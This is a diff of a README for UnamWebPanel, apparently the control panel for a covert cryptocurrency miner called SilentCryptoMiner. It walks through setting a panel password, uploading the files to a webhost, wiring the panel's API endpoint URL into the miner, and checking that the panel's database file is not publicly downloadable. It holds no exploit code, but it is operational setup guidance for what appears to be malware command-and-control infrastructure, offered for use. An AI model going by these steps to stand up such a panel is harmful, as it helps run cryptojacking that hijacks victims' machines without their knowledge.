UnamSanctam/UnamWebPanel/README.md

 Here are some simple steps to get started:
 1. Download the panel files and open the UnamWebPane\config.php file with a text editor.
 2. Change the `$config['password']` to whatever password you wish to use, this is the password used to access the web panel.
-3. Change the `$config['db_file']` to where you will place the database file (unamwebpanel.db), this file should be placed in some location that is not a part of the exposed web server so that it cannot be downloaded by everyone.
-Some online webhosts have a folder called "public_html" that is exposed to the public, you can probably place the database file outside the "public_html" folder and then enter `dirname(__FILE__, 1)."/unamwebpanel.db"` into `$config['db_file']` for it to use the database file one folder back from the location of config.php.
+3. Upload the contents of the UnamWebPanel folder to your webhosts "public_html" folder or the respective folder for your specific webhost.
-4. Upload the contents of the UnamWebPanel folder to your webhosts "public_html" folder or the respective folder for your specific webhost, then upload the unamwebpanel.db to the location that you entered in the config.php, usually just outside the "public_html" folder.
+4. Your web panel should now be up and running, you can browse to the URL or IP of your website and you should see the login screen if everything went correctly.

-5. Your web panel should now be up and running, you can browse to the URL or IP of your website and you should see the login screen if everything went correctly.
+If you wish to add the web panel to the SilentCryptoMiner then enter the following website URL: `http://yourwebsite.com/api/endpoint.php` (replace yourwebsite.com with your URL or IP, also make sure to use the correct `http` or `https` protocol depending on if your site has SSL "support" or not) into the `API Endpoint URL` field inside the miner.

-If you wish to add the web panel to the SilentCryptoMiner then enter the following website URL: `WEBSITEURL/api/endpoint.php` (replace WEBSITEURL with your URL or IP) into the `API Endpoint URL` field inside the miner.
+If you use something other than Apache or IIS to host the web panel then you should check if your database file is exposed to the internet, you can check it by visting the URL `http://yourwebsite.com/unamwebpanel.db` replace yourwebsite.com with your URL or IP), if it says forbidden or doesn't display anything then your database is secured.

 ## Wiki